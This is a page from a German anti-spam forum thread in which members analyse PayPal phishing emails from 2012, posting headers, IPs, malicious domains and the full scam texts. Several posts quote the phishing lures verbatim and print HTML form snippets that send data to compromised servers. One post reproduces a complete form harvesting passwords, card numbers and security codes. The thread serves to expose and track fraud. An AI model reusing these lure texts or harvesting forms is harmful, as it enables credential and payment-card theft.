Seite 20 von 75 ErsteErste ... 1018192021223070 ... LetzteLetzte
Ergebnis 191 bis 200 von 746

Thema: Paypal-Phishing

  1. #191
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder mal die alten Seilschaften in trauter Kriminalität vereint:


    header:
    01: Received: from d169.diamond.fastwebserver.de
    02: (d169.diamond.fastwebserver.de [83.136.86.169])
    03: by xxxxx (Postfix) with ESMTP ID: [ID filtered]
    04: for xxxxx; Sun, 1 Jul 2012 xx:xx:xx +0200 (CEST)
    05: Received: from [83.136.86.169] ([127.0.0.1]) by
    06: d169.diamond.fastwebserver.de with Microsoft SMTPSVC(7.5.7600.16385);
    07: Wed, 27 Jul 2011 xx:xx:xx +0200

    Sehr geehrter Kunde,

    aufgrund eines automatisierten Abgleiches Ihrer Kundendaten mit
    Vergleichsstatistiken wurde das Risiko eines Zahlungsausfalls für Ihr
    Konto als überdurchschnittlich hoch eingestuft.

    Um weiterhin problemlos die Zahlungsmethode Bankeinzug nutzen zu können,
    bitten wir Sie eine Kreditkarte, als Sicherheit bei Zahlungsausfällen
    bei uns zu registrieren.

    Diese wird Ihrem Account nicht als Zahlungsmethode hinzugefügt, sondern
    dient lediglich als Absicherung bei einem nicht ausreichend gedeckten
    Bankkonto.

    Sollten sie keine Kreditkarte bei uns hinterlegen, wird die
    Zahlungsmethode Bankeinzug für Ihr Konto deaktiviert.

    Ihre Kreditkartendaten können Sie mithilfe des beigefügten Formulars
    hinterlegen.

    Es ist dabei irrelevant ob Sie bereits eine Kreditkarte bei uns
    registriert haben, aus vertragsrechtlichen Gründen dürfen wir diese
    Kartendaten nicht als zusätzliche Sicherheit heranziehen.
    Sie können also eine Karte, welche bereits bei uns registriert ist, auch
    als Sicherheit hinterlegen.

    Nach der erfolgreichen Registrierung werden Sie auf die PayPal Seite
    weitergeleitet und können Ihr Konto weiterhin wie gewohnt benutzen.

    Wir bitten die Unannehmlichkeiten zu entschuldigen, dieses Vorgehen ist
    allerdings aufgrund vermehrter Betrugsversuche durch ungedeckte
    Bankkonten erforderlich.

    Mit freundlichen Grüßen,
    Ihr PayPal Kundenservice
    Als HTML-Anhang dann ein (BASE64 codiertes) Formular, welches per PHP verarbeitet wird:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 37.221.161.98 ---> lh19307.limehost.ro/Voxility

    Also 'gehostet' bei den Vlads und registriert in der Ukraine...

    Auf dem Drecksserver lauert dann noch:

    Code:
    24338960.kundensicherheit-online.com	  	 
    26241000.kunden-verbraucherschutz.com	  	 
    kundensicherheit-online.info	  	 
    ns1.kundensicherheit-online.info	  	 
    ns2.kundensicherheit-online.info	  	 
    mail.kundensicherheit-online.info	  	 
    www.kundensicherheit-online.info	  	 
    40158233.packstation-kundendienst.info	  	 
    34766135.kundensicherheit-online.net	  	 
    32388026.kundensicherheit-online.net
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #192
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard

    [https%3A%2F%2Fwww.paypal.com%2Fde&ts=1336100634&hash=02acc027f2ec99ab69f303d3cab 2b905]

    [Link nur für registrierte Mitglieder sichtbar. ]

    Einfach: Sie bezahlen mit zwei Klicks.
    Schnell: PayPal-Zahlungen treffen schnell beim Verkäufer ein.
    Sicher: Ihre Bankdaten sind nur bei PayPal hinterlegt.

    Schützen Sie Ihr Konto
    Halten Sie Ihr PayPal-Passwort geheim. Teilen Sie es niemandem mit.

    Konfliktlösung - PayPal Konto
    Dienstag, 10. Juli 2012
    Guten Tag xxxxx,
    Leider müssen wir Ihnen mitteilen dass Ihr Konto eingeschränkt wurde !

    Wo liegt das Problem?

    Bei Ihrer letzten Kreditkarten Zahlung sind uns ungewöhnliche Aktivitäten aufgefallen.

    Bearbeitungsnummer: PP-331-881-550-118.

    Wie entsperre ich mein Konto?

    Bitte verifizieren Sie sich durch einen Abgleich Ihrer Daten, um Ihr Konto wieder wieder uneingeschränkt nutzen zu können auf folgender Seite:
    https://www.paypal.com/entsperrung-hilfe -> whois: [Link nur für registrierte Mitglieder sichtbar. ]
    Bei Fragen steht Ihnen unser Kundenservice von Mo.-Fr., 8.30 bis 19.00 Uhr, und Sa.-So., 9.00 bis 19.30 Uhr unter der Telefonnummer 0180 500 66 27 zur Verfügung (für Anrufe aus dem Festnetz fallen maximal 14 Cent/Min. an, aus Mobilfunknetzen sind es maximal 42 Cent/Min.).

    ------------------------------------------------------------

    Bitte antworten Sie nicht auf diese E-Mail. Dieses Postfach wird nicht überwacht, deshalb werden Sie keine Antwort erhalten. Wenn Sie Hilfe benötigen, loggen Sie sich in Ihr PayPal-Konto ein, und klicken Sie oben rechts auf einer beliebigen Seite auf den Link "Hilfe".

    Copyright © 1999-2012 Pay. Alle Rechte vorbehalten.

    PayPal (Europe) S.à r.l. & Cie, S.C.A.
    Société en Commandite par Actions
    Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg
    RCS Luxemburg B 118 349

    E-Mail-ID PP785
    Die Domain ist auch ganz frisch registriert:

    Domain Name: SSL-CERTIFICATES-PAYMENT.COM

    Registrant:
    Angaben zur registrierenden Person wurden entfernt, hier im Forum dürfen keine Klarnamen genannt werden!

    Creation Date: 10-Jul-2012
    Expiration Date: 10-Jul-2013
    Hier noch ein paar Mailinfos:


    header:
    01: Return-Path: security [at] paypal-help.de
    02: Received: from wp201.webpack.hosteurope.de ([80.237.132.208]) by mx-ha.web.de
    03: (mxweb105) with ESMTP (Nemesis) ID: [ID filtered]
    04: Received: from ip-80-226-24-8.vodafone-net.de ([80.226.24.8] helo=MRV-VAIO);
    05: authenticated by wp201.webpack.hosteurope.de running ExIM with esmtpa ID: [ID filtered]
    06: From: "PayPal Service" <security [at] paypal-help.de>
    07: Subject: Ihr PayPal-Konto ist eingeschränkt! Ihre Mithilfe ist gefragt
    08: To: poor [at] spamvictim.tld
    09: Content-Type: text/html; charset=iso-8859-1
    10: Date: Tue, 10 Jul 2012 xx:xx:xx +0200
    11: Message-ID: [ID filtered]
    12: Status: N
    13: X-bounce[BOUNCE filtered]@paypal-help.de;1341956409;b4f4eac6;
    14: Envelope-To: <poor [at] spamvictim.tld>
    15: X-UI-Filterresults: ;V01:K0:lKXSb8Ko:r2JxySR3aaEwH6GQUmvU92oTVPhWTVhkSFo
    16: Ay7+UMelBgV10Rupp9VYzfrdi7qbZ8fGOEW8JfL5lLm+V6UAMqY1vXn2Vm5my8/reDFz8q2
    17: aIJKCCyUc8XmCkJc7HCZMPM9KCA6WZCRoMCF+WHOhZURMkr7KW7Zd55AeL3qxoZlpELAyY7 U5LzGdyezpzqKBG
    Geändert von Mittwoch (11.07.2012 um 11:46 Uhr) Grund: [whois] ergänzt, persönliche Daten entfernt

  3. #193
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wieder die altbekannten Vlads/Russkis mit dem Formular im HTML-Anhang:


    header:
    01: Received: from Mail02.amc-wireless.com (81333-mail02.amc-wireless.com
    02: [74.63.185.98])
    03: by xxxxx (Postfix) with ESMTP ID: [ID filtered]
    04: for xxxxx; Tue, 17 Jul 2012 xx:xx:xx +0200 (CEST)
    05: Received: from User ( [80.86.101.54])
    06: by Mail02.amc-wireless.com (American Millennium Corporation Mail
    07: Server) with ASMTP ID: [ID filtered]
    08: Tue, 17 Jul 2012 xx:xx:xx -0600

    IP: 80.86.101.54] ---> iNES GROUP SRL, Romania

    We requested information from you for the following reason:

    We recently received a report of unauthorized credit card use associated
    with this account.
    As a precaution, we have limited access to your PayPal account in order
    to protect against future unauthorized transactions.

    Case ID Number: PP-503-472-569

    Please download the form attached to this email and open it in a web
    browser.
    Once opened, you will have to complete the steps to restore your
    account access. We appreciate your understanding as we work to ensure
    account safety.

    Sincerely,
    PayPal Account Review Department
    Das Formular im HTML-Teil wird dann verarbeitet von:

    [html]<form name="raf"
    action="http://jvarosnebi.ge/wp-content/themes/sportpress/scripts/cache/pp.php"
    method="post" onsubmit="return validate(this)"><input type="hidden"
    name="redir" value="https://www.paypal.com/" />[/html]

    IP: 212.58.116.73 ---> www2.proservice.ge

    An
    form name="raf"
    immer wieder zu erkennen.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  4. #194
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder derselbe Phishki aus Osteuropa:


    header:
    01: Received: from mail-out.vps.gmoserver.jp (EHLO
    02: mailgw02.vps.gmoserver.jp) [210.172.133.183]
    03: by mx0.gmx.net (mx025) with SMTP; 18 Jul 2012 xx:xx:xx +0200
    04: Received: from smtp.take-server.net (take-server.net [61.113.79.71])
    05: by mailgw02.vps.gmoserver.jp (Postfix) with ESMTP ID: [ID filtered]
    06: Thu, 19 Jul 2012 xx:xx:xx +0900 (JST)
    07: Received: from localhost (localhost.localdomain [127.0.0.1])
    08: by smtp.take-server.net (Postfix) with ESMTP ID: [ID filtered]
    09: Thu, 19 Jul 2012 xx:xx:xx +0900 (JST)
    10: Received: from smtp.take-server.net ([127.0.0.1])
    11: by localhost (take-server.net [127.0.0.1]) (amavisd-new, port 10024)
    12: with ESMTP ID: [ID filtered]
    13: Received: from User (ifs169.internetdsl.tpnet.pl [79.189.148.169])
    14: by smtp.take-server.net (Postfix) with ESMTPA ID: [ID filtered]
    15: Thu, 19 Jul 2012 xx:xx:xx +0900 (JST)

    Liebe Paypal Benutzer/in,

    Als Teil unseren Sicherheitsgründen,wir überprüfen regelmдЯig Aktivitдt
    in der
    Paypal System.Wir haben Ihnen vor kurzem kontaktiert,dannach wir ein
    Problem mit
    Ihren Konto bemerkt haben.

    Wir haben Ihnen Information aus folgendem Grund angefordert:

    Vor kurzem haben wir einen Bericht aus unerlaubte Kreditkartebenutzung
    bekommen,die zu diesem Konto verbunden ist.Als VorsichtsmaЯnahme haben
    wir Ihren
    Zutritt zu dem Paypal Konto begrenzt,um Sie gegen zukünftige unerlaubte
    Transaktionen zu schützen. transactions.

    Prozess ID Nummer: PP-503-472-569

    Das ist eine Mahnung für Sie,sodass sie Ihres Konto baldmцglichst
    wiederherstellen.

    Bitte laden Sie die Form herunter,die zu diesem E-mail beigefügt ist,und
    erцffnen Sie es mit einem Web Browser. Einmal geцffnet,werden Sie mit
    Schritten
    vorausgesetzt,um Ihren Kontozugang wiederherzustellen. Wir schдtzen Ihres
    Verstдndnis ab,seitdem wir arbeiten,um Ihren Konto zu versichern.

    Bitte laden Sie die Form herunter,die zu diesem E-mail beigefügt ist,und
    erцffnen Sie es mit einem Web Browser. Einmal geцffnet,werden Sie mit
    Schritten
    vorausgesetzt,um Ihren Kontozugang wiederherzustellen. Wir schдtzen Ihres
    Verstдndnis ab,seitdem wir arbeiten,um Ihren Konto zu versichern. 8.In
    übereinstimmung mit der Paypal Benutzer-Lizenzvereinbarung,wird Ihrer
    Kontozugriff begrenzt bleiben,bis dieses Problem aufgeklдrt wird.
    Leider,wenn deinen Kontozugriff begrenzt für eine lдngere Zeit
    bleibt,kann es zu
    weiteren Einschrдnkungen oder zu einer Auflцsung des Kontos führen. Wir
    ermutigen Sie,Ihr PayPal Konto so schnell wie mцglich
    wiederherzustellen,um das
    zu vermeiden.

    Wir bedanken uns für Ihre unverzügliche Aufmerksamkeit an diesem Fall.Bite
    verstehen Sie,dass das eine SicherheitsmaЯnahme ist,mit der Absicht,Sie
    und Ihr
    Konto zu schützen. Wir bitten um Ihr Verstдndnis.

    Mit freundlichen GrüЯen,
    PayPal Account Review Department

    ----------------------------------------------------------------
    Copyright © 1999-2012 PayPal. Alle Rechte vorbehalten.

    PayPal (Europe) S.a r.l. & Cie, S.C.A.
    Sociйtй en Commandite par Actions
    Registered Office: 5th Floor 22-24 Boulevard Royal L-2449, Luxembourg
    RCS Luxembourg B 118 349

    PayPal Email ID PP3573
    Im HTML-Anhang wird dann auf gecracktem Server gephisht:

    [HTML]<form name="raf" action="http://www.niagaragreenbelt.com/jpg.php"
    method="post" onsubmit="return validate(this)">
    <input type="hidden" name="redir"
    value="https://www.paypal.com/" />[/HTML]

    IP: 96.30.45.92 ---> host.tourismniagara.com

    Man beachte: form name="raf"
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #195
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Die Russen-Mafia phisht wieder:


    header:
    01: Received: from mail.s-it.ru (EHLO mail.s-it.ru) [95.163.78.92]
    02: by mx0.gmx.net (mx064) with SMTP; 24 Jul 2012 xx:xx:xx +0200
    03: Received: from mail.s-it.ru (localhost [127.0.0.1])
    04: by mail.s-it.ru (Postfix) with ESMTP ID: [ID filtered]
    05: Tue, 24 Jul 2012 xx:xx:xx +0400 (MSD)
    06: Received: by mail.s-it.ru (Postfix, from userID: [ID filtered]
    07: ID: [ID filtered]
    08: Received: from localhost by mail.s-it.ru
    09: with SpamAssassin (version 3.3.2);
    10: Tue, 24 Jul 2012 xx:xx:xx +0400

    PayPal *Ihr Kontozugang ist begrenzt*

    **

    *Sehr geehrter Kunde, *

    *Ihr Kontozugang wurde für den folgenden Grund begrenzt: Wir haben während
    unserer geplanten Routineuntersuchung eine Unzulänglichkeit in Ihren
    Rechnungen
    gefunden. Wir haben den Zugang zu sensiblen PayPal Kontooption! en
    begrenzt bis
    Sie uns die verlangten Informationen zusenden. Wir verstehen dass
    begrenzter
    Kontozugang für Sie ein Problem darstellt, aber die Sicherheit Ihres
    Kontos ist
    unser ha uptsächliches Interesse. ***

    *

    *
    *Secure Server
    *


    Finden Sie aus wie Sie die Begrenzung aufheben können!
    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    *Ihre Sicherheit ist unsere Priorität
    Mit freundlichen Grüßen,
    PayPal

    *

    Copyright 1999-2012 Paypal. All rights reserved.
    IP: 200.98.246.250 ---> cpweb0001.servidorwebfacil.com
    Gecrackter Server, aber natürlich völlig schmerz- und merkbefreit in Brasilien gehostet.

    leitet aber nur weiter auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 89.185.228.8 ---> ex8.exmasters.com, CZ
    alte Seilschaften?
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #196
    Urgestein Avatar von Eniac
    Registriert seit
    18.07.2005
    Ort
    Dragasani - Lagos - Moskau - Cloppenburg
    Beiträge
    5.203

    Standard new Policy Update


    header:
    01: Received: from User ([173.45.255.64] RDNS failed) by mail.zd-law.com with
    02: Microsoft SMTPSVC(6.0.3790.4675);
    03: Mon, 23 Jul 2012 xx:xx:xx -0400
    04: Reply-To: <itunes [at] new.itunes.com>
    05: From: "paypal.com"<itunes [at] new.itunes.com>
    06: Subject: new Policy Update
    07: Date: Mon, 23 Jul 2012 xx:xx:xx -0000
    08: MIME-Version: 1.0
    09: Message-ID: [ID filtered]
    10: Content-Type: multipart/mixed; boundary="MIRAPOINT_PART1_500ef48d"
    11: Bcc:
    12: Return-Path: itunes [at] new.itunes.com

    PayPal account information:

    Hello
    We recently determined that different computers have logged into your account.
    Therefore, your account has been limited.
    To return to your PayPal account, you will need to update your account information.
    It's easy:


    1.Download the attached form and open it in a secure browser window.
    2.Once opened, you will be provided with steps to restore your access, then follow the instructions.


    Update account information, it is important because it helps us to prevent fraudsters from stealing your information.
    Sincerely,
    PayPal


    Help Center | Security
    Please do not respond to this email. It'll just confuse the computer that sent and you will not receive a respons


    PayPal Email ID PP2659
    Copyright © 2012 PayPal, Inc Tous droits réservés.
    Anhang klassifiziert als Mal/Phish-A.

    IP: 173.45.255.64 = Slicehost LLC



    Eniac
    Die weltweit grösste Fakeseiten-Datenbank: http://db.aa419.org/fakebankslist.php
    Viele falsche Escrow-Seiten: http://escrow-fraud.com/search.php

    DER HERR ERSCHUF IN SEINEM ZORN - CLOPPENBURG UND BÜTTELBORN

  7. #197
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Phishki ist mal wieder unterwegs, und die Kreditkartendaten will der Gauner natürlich gleich auch:


    header:
    01: Received: from wvps80-90-204-168.vps.webfusion.co.uk (EHLO
    02: mail.e-rth.gr) [80.90.204.168]
    03: by mx0.gmx.net (mx026) with SMTP; 07 Sep 2012 xx:xx:xx +0200
    04: Received: from User ([195.202.94.254]) by e-rth.gr with MailEnable
    05: ESMTP; Fri, 7 Sep 2012 xx:xx:xx +0300

    /**//**/
    /**//**//*PayPal
    __________________________________*/

    Guten Tag !

    Um Ihr PayPal-Konto vollständig zu aktivieren, verifizieren Sie dieses
    bitte
    noch. Die Verifizierung ist ganz einfach und erfordert nur wenige Schritte.

    Ungewöhnliche Kontobewegungen haben es notwendig gemacht Ihr Konto
    einzugrenzen
    bis zusätzliche Informationen zur Überprüfung gesammelt werden

    --------------------------------------------------------------------------------

    */Bitte laden Sie das Formular .
    Die Verifizierung ist ganz einfach und erfordert nur wenige Schritte./*

    --------------------------------------------------------------------------------

    //

    Sie erhalten außerdem in den nächsten Tagen eine E-Mail von uns, in der wir
    Ihnen alle weiteren Schritte erklären.

    Bei Fragen steht Ihnen unser Kundenservice von Mo.-Fr., 8.00 bis 21.30
    Uhr, und
    Sa.-So., 9.00 bis 19.30 Uhr unter der Telefonnummer 0180 500 66 27 zur
    Verfügung
    (für Anrufe aus dem Festnetz fallen maximal 1,14 Cent/Min. an, aus
    Mobilfunknetzen sind es maximal 1,42 Cent/Min.).


    Herzliche Grüße
    Ihr PayPal-Team

    --------------------------------------------------------------------------------
    Copyright © 1999-2012 PayPal. Alle Rechte vorbehalten.

    PayPal (Europe) S.à r.l. & Cie, S.C.A.
    Société en Commandite par Actions
    Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg
    RCS Luxemburg B 118 349

    PayPal E-Mail-ID PP538



    Download het formulier.html

     Konto PayPal - PayPal
    *NOTE:* This form requires Javascript.
    You either have Javascript disabled or you are using an old browser
    which does
    not support Javascript.
    Please enable Javascript or open this form in a browser which supports
    Javascript.

    *PayPal *
    *
    *Ihr Kontozugang wurde für den folgenden Grund begrenzt:*

    # Wir haben während unserer geplanten Routineuntersuchung eine
    Unzulänglichkeit in
    Ihren Rechnungen gefunden. Wir haben den Zugang zu sensiblen PayPal
    Kontooptionen begrenzt bis Sie uns die verlangten Informationen
    zusenden. Wir
    verstehen dass begrenzter Kontozugang für Sie ein Problem darstellt,
    aber die
    Sicherheit Ihres Kontos ist unser hauptsächliches Interesse.
    sichern .
    *
    .*Sie können die Konto Begrenzung aufheben indem Sie Ihre persönlichen
    Informationen bestätigen.*

    E-Mail-Adresse:

    Password PayPal:

    Vorname und Nachname: (auf der karte )

    Geburtsdatum:
    Tag ..........Monat ........Jahr
    / /

    Rechnungsadresse:

    Ort:

    Name der Mutter:

    PLZ :

    Telefonnummer:

    Kartennummer :
    (16 Stellen, keine Bindestriche und Leerzeichen )

    Ablaufdatum mm/yyyy)
    /
    Kartenprüf-Nummer : Was ist das ?

    Abrechnungskonto der:
    (Kontonummer : max.10-stellig )

    Passwort:
    (Verified by Visa oder MasterCard SecureCode )

    *Für Ihre Sicherheit werden wir die Informationen die Sie eingegeben haben
    uberprüfen.*
    Bitte clicken Sie auf *Eingeben* um Ihre Informationen zu uberprüfen. Bitte
    clicken Sie nur einmal. Sobald Ihre Informationen uberprüft wurden,
    werden Sie
    zur Konfirmationsseite weitergeleitet.
    --------------------------------------------------------------------------------

    *Ich stimme meinem Konto ab wiederherstellen PayPal **.

    Zustimmen und abschicken *

    **
    © 1998-2012 PayPal.com,Inc. oder Tochtergesellschaften .
    Gephisht wird wieder - wie üblich - per HTML-Anhang. Die 'Datenverarbeitung' übernimmt der gecrackte Server:

    [HTML]<form name="raf" action="
    http://www.midsouthprotour.com/inges.test.online.kliken.php"
    method="post" onsubmit="return validate(this)"><input type="hidden"
    name="redir" value="https://www.paypal.de/" />[/HTML]

    IP: 64.29.151.221 ---> hostedc40.carrierzone.com
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  8. #198
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.603

    Standard


    header:
    01: Received: from s1.blackhost.ru (s1.blackhost.ru [78.47.147.125])
    02: (using TLSv1 with cipher AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by x (Postfix) with ESMTPS ID: [ID filtered]
    05: for <x>; Fri, 7 Sep 2012 xx:xx:xx +0200 (CEST)
    06: Received: from [46.23.74.162] (helo=User)
    07: by s1.blackhost.ru with esmtpa (Exim 4.72)
    08: (envelope-from <webmaster [at] blackhost.ru>)
    09: ID: [ID filtered]
    Mal wieder typisch mit HTML-Anhang - Microsoft mein dazu:
    [Link nur für registrierte Mitglieder sichtbar. ]
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  9. #199
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Die Dreckskiste ist immer noch online, da muss ich wohl mal die Daumenschrauben anziehen:


    header:
    01: Received: from server88-208-216-66.live-servers.net (HELO
    02: [88.208.216.66]) [88.208.216.66]
    03: by mx0.gmx.net (mx075) with SMTP; 11 Sep 2012 xx:xx:xx +0200
    04: Received: From svm16790.vps.tagadab.com [95.172.30.162] by
    05: [88.208.216.66]
    06: (Matrix SMTP Mail Server v(1.4))
    07: ID=xxxxx ; Tue, 11 Sep 2012 xx:xx:xx +0100

    [HTML]<form name="raf" action="
    http://www.midsouthprotour.com/inges.test.online.kliken.php"
    method="post" onsubmit="return validate(this)"><input type="hidden"
    name="redir" value="https://www.paypal.de/" />[/HTML]
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #200
    Neues Mitglied
    Registriert seit
    16.09.2012
    Beiträge
    2

    Standard

    Update:


    header:
    01: Return-Path: spoon [at] clockwatching.net
    02: Received: from clockwatching.net ([216.218.200.85]) by mx-ha.web.de (mxweb002)
    03: with ESMTP (Nemesis) ID: [ID filtered]
    04: Sun, 16 Sep 2012 xx:xx:xx +0200
    05: Received: from ts01.m3bygg.se (static-212.214.3.222.addr.tdcsong.se
    06: [212.214.3.222])
    07: by clockwatching.net (Postfix) with ESMTPA ID: [ID filtered]

    Und das Formular:

    [HTML]
    <P>Bitte validieren Sie sich =FCber folgenden Link durch einen Abgleich =
    Ihrer Daten als rechtm=E4=DFiger Besitzer. Im Anschluss k=F6nnen Sie Ihr=
    Paypal-Kundenkonto wieder uneingeschr=E4nkt nutzen: </P>
    <P><A href=3D"http://www.paypal-konflikt.pro/de/konflikt/dp/B0029YZ758/r=
    ef=3Dsr_1_2/sicherheit/konto_verifizieren/" target=3D_blank>Hier klicken=
    </A></P>[/HTML]

Seite 20 von 75 ErsteErste ... 1018192021223070 ... LetzteLetzte

Ähnliche Themen

  1. Paypal Phishing von deutschem Server?
    Von Coke1984 im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 3
    Letzter Beitrag: 11.04.2007, 15:17
  2. [phishing] PayPal Security Measures
    Von Sirius im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 14
    Letzter Beitrag: 11.08.2005, 00:05
  3. [phishing] PayPal
    Von Maq im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 11
    Letzter Beitrag: 19.03.2005, 20:21
  4. PayPal Phishing ?
    Von rumbarumbatätärräää im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 1
    Letzter Beitrag: 19.12.2004, 00:04

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen